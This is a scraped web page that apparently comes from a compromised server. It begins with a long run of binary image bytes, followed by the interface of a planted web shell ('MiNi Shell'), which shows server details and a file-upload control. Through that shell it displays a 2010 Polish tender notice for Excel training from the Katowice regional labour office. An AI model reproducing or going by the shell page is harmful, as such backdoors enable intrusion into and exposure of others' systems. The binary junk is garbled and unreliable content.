JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/245565-N-2010.html

<p class="kh_header"><b>Katowice: ZORGANIZOWANIE I PRZEPROWADZENIE  SZKOLENIA W ZAKRESIE FUNKCJI PODSTAWOWYCH I ZAAWANSOWANYCH MS EXCEL</b><br>
<b>Numer ogłoszenia: 245565 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna smorzadu województwa nieposiadająca osobowosci prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE  SZKOLENIA W ZAKRESIE FUNKCJI PODSTAWOWYCH I ZAAWANSOWANYCH MS EXCEL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w zakresie funkcji podstawowych i zaawansowanych MS Excel na bazie 2003 i 2007 dla pracowników Wojewódzkiego Urzędu Pracy w Katowicach.

I.	ZAKRES MERYTORYCZNY SZKOLENIA:
Program poszczególnych edycji szkolenia powinien być każdorazowo dostosowany przez Wykładowcę do poziomu zaawansowania danej grupy.  
Zagadnienia, które powinny zostać omówione podczas szkolenia, to:
Poziom podstawowy oraz poziom średniozaawansowany
1.	Interfejs programu
a)	podstawowe wprowadzanie danych, edycja komórek,
b)	kopiowanie i wypełnianie komórek,
c)	dostosowywanie widoku arkusza (blokowanie kolumn, wierszy, okien);
2.	Praca z danymi
a)	format danych w ujęciu księgowym i sprawdzanie ich poprawności,
b)	formuły (wprowadzanie i modyfikowanie),
c)	najczęściej wykorzystywane funkcje (funkcje matematyczne, warunkowe itd.),
d)	autofiltry;
3.	Formatowanie arkuszy.
4.	Drukowanie. Przygotowanie arkuszy do wydruku.
5.	Tworzenie i modyfikacja wyglądu wykresu. 
6.	Przeznaczenie środków Funduszu Pracy.
7.	Szukanie wyniku.
8.	Skróty klawiaturowe. 

Poziom zaawansowany

1.	Przypomnienie zagadnień podstawowych.
2.	Tworzenie i edycja wielopoziomowych filtrów.
3.	Tworzenie i eksport wykresów dla potrzeb stron www.
4.	Formatowanie warunkowe.
5.	Tabele i wykresy przestawne.
6.	Analizowanie skoroszytu
a)	czujka,
b)	śledzenie zalezności,
7.	Formaty plików, import i eksport.
8.	Ochrona danych.
a)	ochrona komórek, skoroszytów i arkuszy,
b)	typowe scenariusze ustawienia zabezpieczeń,
9.	Formularze.
10.	Sumy częściowe według kategorii.
11.	Przygotowanie pliku i danych w nim zawartych do korespondencji seryjnej


II.	ZAŁOŻENIA ORGANIZACYJNE

1.	Szkolenie zostanie przeprowadzone w czterech edycjach o różnych poziomach zaawansowania.
2.	Wszystkie edycje będą miały formę szkolenia stacjonarnego i przeprowadzone zostaną na terenie miasta Katowice.
3.	Szkolenie zorganizowane zostanie w następujących terminach:
a)	I edycja: 18 - 19 października 2010 r. - poziom podstawowy,
b)	II edycja: 21 - 22 października 2010 r. - poziom średniozaawansowany,
c)	 III edycja: 25 - 26 października 2010 r. - poziom zaawansowany,
d)	IV edycja: 28 - 29 października 2010 r. - poziom zaawansowany

4.	Przewidywana liczba uczestników szkolenia to łącznie 45 osób, w tym 10 osób biorących udział 
w I edycji szkolenia, 13 osób w II edycji szkolenia, 8 osób w III edycji szkolenia oraz 14 osób w IV edycji szkolenia, jednakże ostateczna ilość osób biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem ich rozpoczęcia. 

5.	Każda z edycji szkolenia trwać będzie 16 godzin szkoleniowych, przy czym godzina szkoleniowa wynosi 45 minut.

6.	Każda z edycji zrealizowana zostanie w sali wykładowej zlokalizowanej na terenie miasta Katowice, przy czym budynek, w którym odbywać się będą zajęcia w terminie 21 - 22 października 2010 r. wraz z salą wykładową oraz salą, w której będą podawane posiłki ma być dostosowany do osób niepełnosprawnych poruszających się na wózku inwalidzkim.

III.	 W RAMACH REALIZACJI USŁUGI SZKOLENIOWEJ WYKONAWCA MUSI ZAPEWNIĆ:

1.	Wykładowcę posiadającego doświadczenie zawodowe niezbędne do wykonania zamówienia, który przeprowadzi każdą edycję szkolenia w formie wykładów oraz ćwiczeń zgodnie 
z harmonogramem dostosowanym każdorazowo do poziomu zaawansowania danej grupy szkoleniowej i udzieli odpowiedzi na zadawane przez uczestników w trakcie szkolenia pytania i wątpliwości;
2.	materiały szkoleniowe dla każdego uczestnika w postaci teczki zawierającej notes, długopis oraz prezentację szkolenia w formie papierowej i elektronicznej;
3.	wydanie zaświadczeń o ukończeniu szkolenia dla uczestników;
4.	catering dla uczestników wszystkich edycji, składający się z przerw kawowych i obiadu. Każdy uczestnik szkolenia korzystał będzie z:
a)	3 przerw kawowych (2 przerwy w pierwszym dniu szkolenia podane o godz. 11.00 i 15.30 oraz 1 przerwa w drugim dniu szkolenia podana o godz. 11.15), każdej składającej się z:
- wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki 
z nadzieniem w ilości nie mniejszej niż 40g na osobę z każdego rodzaju,
- napoi: kawy rozpuszczalnej w saszetkach, herbaty ekspresowej, soku jabłkowego oraz pomarańczowego podawanych w dzbankach w ilości 0,33 l/os, wody mineralnej gazowanej i niegazowanej w ilości 0,33 l/os,
- dodatków: cytryna, cukier, mleko.

Napoje oraz wyroby cukiernicze dla każdego uczestnika podczas wszystkich przerw kawowych powinny być podawane w/na zastawie ceramicznej.

b)	2 obiadów (po jednym w każdym dniu szkolenia), składających się z:
- zupy,
- dania głównego (mięsnego z dodatkiem ziemniaków, ryżu lub frytek i zestawu surówek 
w każdym dniu szkolenia),
- napoi różnorodnych: kawa, herbata, soki, woda mineralna gazowana i niegazowana,
- dodatków: cytryna, cukier, mleko.
Obiad powinien być podany o godzinie 13.00 zarówno pierwszego jak i drugiego dnia szkolenia.
Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia.
Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu.

Zarówno przerwy kawowe jak i obiady powinny być podawane w innej sali niż sala wykładowa.

5.	salę szkoleniową o wielkości odpowiedniej do ilości osób w każdej edycji szkolenia, zapewniającą dostęp do komputera dla każdego uczestnika.

UWAGI:
1.	Wykonawca wyłoniony w niniejszym postępowaniu w terminie dwóch dni roboczych przed rozpoczęciem I edycji szkolenia przedstawi Zamawiającemu harmonogramy dla każdej edycji szkolenia, uwzględniające zagadnienia wskazane w punkcie I  rozdziału II SIWZ.
2.	Zamawiający dopuszcza możliwość wprowadzenia zmiany do niniejszej umowy w zakresie Wykładowcy wskazanego do prowadzenia zajęć;
Warunki zmiany: zmianę taką dopuszcza się w sytuacji, gdy okaże się ona konieczna ze względu na chorobę Wykładowcy wskazanego do prowadzenia zajęć, z tym że Wykładowca prowadzący szkolenie w zastępstwie również musi posiadać doświadczenie zawodowe wskazane w pkt 6.1.4 SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie co najmniej 5 usług o wartości nie mniejszej niż 10 000,00 zł każda, których przedmiotem było zorganizowanie i przeprowadzenie szkoleń;

	Opis sposobu dokonywania oceny spełnienia tego warunku:
	Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie 
(np. referencje). 
Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy 
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże, iż dysponuje co najmniej jedną osobą wskazaną jako wykładowca do realizacji zamówienia, legitymującą się przeprowadzeniem co najmniej 5 szkoleń w zakresie funkcji podstawowych i zaawansowanych MS Excel na bazie 2003 i 2007;

	Opis sposobu dokonywania oceny spełnienia tego warunku:
	Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu osób uczestniczących w realizacji zamówienia wraz z informacjami na temat ich doświadczenia zawodowego niezbędnego do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami.
Nie wykazanie spełnienia w/w warunku skutkować będzie wykluczeniem Wykonawcy 
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2.2). W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza możliwość wprowadzenia zmiany do niniejszej umowy w zakresie Wykładowcy wskazanego do prowadzenia zajęć;
Warunki zmiany: zmianę taką dopuszcza się w sytuacji, gdy okaże się ona konieczna ze względu na chorobę Wykładowcy wskazanego do prowadzenia zajęć, z tym że Wykładowca prowadzący szkolenie w zastępstwie również musi posiadać doświadczenie zawodowe wskazane w pkt 6.1.4 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach 
ul. Kościuszki 30
III pietro pok. 304 - 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach 
ul. Kościuszki 30
III pietro pok. 352.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com